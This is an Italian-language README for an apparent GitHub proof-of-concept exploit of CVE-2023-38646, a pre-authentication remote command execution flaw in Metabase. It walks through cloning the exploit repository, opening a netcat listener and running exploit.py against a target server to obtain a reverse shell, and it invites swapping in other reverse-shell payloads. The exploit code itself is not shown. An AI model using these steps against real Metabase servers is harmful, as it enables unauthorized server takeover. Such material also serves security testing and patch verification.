
Questo è uno script Proof of Concept (PoC) per sfruttare Metabase, uno strumento open-source di business intelligence e analisi dei dati.
Questo è uno script Proof of Concept (PoC) per sfruttare Metabase, uno strumento open-source di business intelligence e analisi dei dati. Metabase consente agli utenti di visualizzare e interagire con i propri dati, rendendolo una potente piattaforma per l'analisi dei dati.
Questa vulnerabilità, indicata come CVE-2023-38646, consentiva agli aggressori di eseguire comandi arbitrari sul server senza richiedere alcuna autenticazione. L'impatto di questa falla era grave, poiché concedeva accesso non autorizzato al server al livello di privilegio del server.
Clona questo repository
git clone https://github.com/threatHNTR/CVE-2023-38646.git
Spostati nel repository
cd CVE-2023-38646
Prima di eseguire lo script, configura un listener Netcat
nc -nlvp chosen-port
Esegui lo script
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
Sfruttamento: Lo script tenterà di inviare una reverse shell al server Metabase di destinazione. In caso di successo, riceverai una shell sulla tua macchina. Sentiti libero di cambiare il payload per provare diverse reverse shell.
GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
Metabase Advisory: https://www.metabase.com/blog/security-advisory
Metabase GitHub: https://github.com/metabase/metabase
Assetnote Blog - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/